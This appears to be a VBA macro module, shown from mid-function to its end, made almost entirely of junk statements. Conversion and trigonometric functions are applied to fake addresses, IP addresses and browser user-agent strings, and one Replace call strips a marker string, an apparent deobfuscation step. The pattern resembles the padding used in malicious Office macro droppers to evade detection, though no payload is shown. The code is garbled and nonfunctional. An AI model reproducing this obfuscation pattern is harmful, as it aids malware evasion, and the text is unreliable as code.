Lsdiznaxq = CStr(356)
Pcbebygepffmy = "iwh" '
   Rem Car
Second CInt("Jacobi IncApt. 752South")
Txatzfwa = CDate(Ddbcamumbw)
Durvdlbiqbe = 978
Second Jowyoxrtzzkr
Qbgbicftfb = CByte("Shirt")
Lyvsbyji = CSng("Gloves")
Xnnygueugdpak = CBool("Corporate67755 Ali Glens, Edisonmouth, Mauritania")
Awppqiuumm = Tan("Bike")
Rem 86.253.159.37
Day 453
Hymigttdsnjvk = CInt(Vbmknoiact)
Minute Sin("Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.7.89675.6)")
Year Log("Leannon - SkilesApt. 092South")
Weekday CLng(Pdtalnxx)
Ujhrdsmnteax = 856
Zcfjyxkonrda = "Central1455 Klocko Lock, East Maudeberg, Niue"
Weekday Xinsoagddvl
Day 958
Oaoardbajio = "Computer"
'Senior696 Abernathy Bypass, Bergemouth, Tunisia
Kfvpnctzplqij = Cos(362)
   Rem Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/533.2.0 (KHTML, like Gecko) Chrome/32.0.804.0 Safari/533.2.0
Day CDbl("Principal56928 Abbott Motorway, Heathburgh, Colombia")
Aydgdnue = CLng(Xadsurvzwlofx)
Ksjbcxull = 961
DateValue Wuvrzdredibif
Oksmvbsysvk = CStr("145.76.108.144")
Cdprxxuadfm = CDate("Pants")
Tgzikdimijt = Fix("89.127.99.88")
Vewcvpaecatkl = CStr("Kuhic - HauckSuite 535East")
Rem 89.3.183.143
Day 938
Plffbiimzkkgu = CStr(Twsycqeajwki)
Month Tan("Crooks - BashirianApt. 400Southeast")
TimeValue Sqr("Human0293 Cremin Crest, Jasminhaven, Switzerland")
Weekday CBool(Gyyvkwxen)
Mrwsljfdhhw = 854
Ghlkvjrzrf = "76.131.45.169"
Minute Mkjdwoivhp
Hour 986
Iynefjzjg = "Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/536.2.1 (KHTML, like Gecko) Chrome/29.0.805.0 Safari/536.2.1"
'Howell and SonsSuite 346West
Dlmjegqvmdg = Hex(424)
Izgzjwshhmepq = Replace(Zpxwzlywn, Pcbebygepffmy, "")
   Rem Shanahan - KiehnSuite 433South
Hour Int("249.79.61.180")
Svuvgglbamsyx = CStr(Ctcwhkocqg)
Efghdubun = 751
TimeValue Qqoyxtkqmhdt
Peoetdpcbgwu = CDate("Stoltenberg - LednerSuite 794North")
Dvxxpcmgsmq = Cos("Rowe and SonsApt. 508Southeast")
Qrxblhnnq = CSng("Shoes")
Ujcopicdovm = Int("Hoeger - ZiemannApt. 496Northwest")
Rem Murphy, Emard and JohnsonApt. 403Southwest
Second 728
Fdwhjmcnkx = Hex(Efkmrbnjhd)
Minute Fix("Regional052 Carlo Hollow, Kieranland, Cook Islands")
MonthName Sin("Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/534.2.1 (KHTML, like Gecko) Chrome/25.0.823.0 Safari/534.2.1")
Month Sin(Xrkkntldamvik)
Dkcklddkc = 698
Xuzhdbxxjsc = "Skiles, Emmerich and SkilesApt. 268South"
Year Qmvjrkcc
Minute 587
Jyetuwughswwq = "40.242.153.171"
'Adams - ZboncakApt. 097East
Jtknwmbsctzi = Sqr(542)
   Rem 75.29.152.187
MonthName CDbl("Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/538.1.2 (KHTML, like Gecko) Chrome/25.0.817.0 Safari/538.1.2")
Aqwydngk = Sqr(Ifnbxytcb)
Qcpwlwlvn = 503
TimeValue Stjsqquq
Tusaldoeph = Cos("Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/533.0.2 (KHTML, like Gecko) Chrome/24.0.828.0 Safari/533.0.2")
Yjnhbrruob = CDbl("106.48.154.173")
Ntseidhlj = Atn("Human706 Stan Glens, Libbieton, Bahamas")
Hwvasxryuegvz = CBool("126.167.57.113")
Rem Chips
Second 169
Odzuvrqons = Fix(Vmaocdmfkg)
Year Tan("215.34.127.69")
Day Sqr("Chips")
Day CBool(Xxdjagxtyaoel)
Frihiinvlupdr = 431
Yhlawynhngurl = "186.247.9.39"
Minute Wdnehobyjqjbr
Second 855
Dfhzbhsksa = "Mozilla/5.0 (Windows NT 6.3; rv:5.6) Gecko/20100101 Firefox/5.6.4"
'Russel - O'KeefeApt. 871Northwest
Vanqcaoymq = CLng(360)
End Function

Attribute VB_Name = "Potcsnxaitp"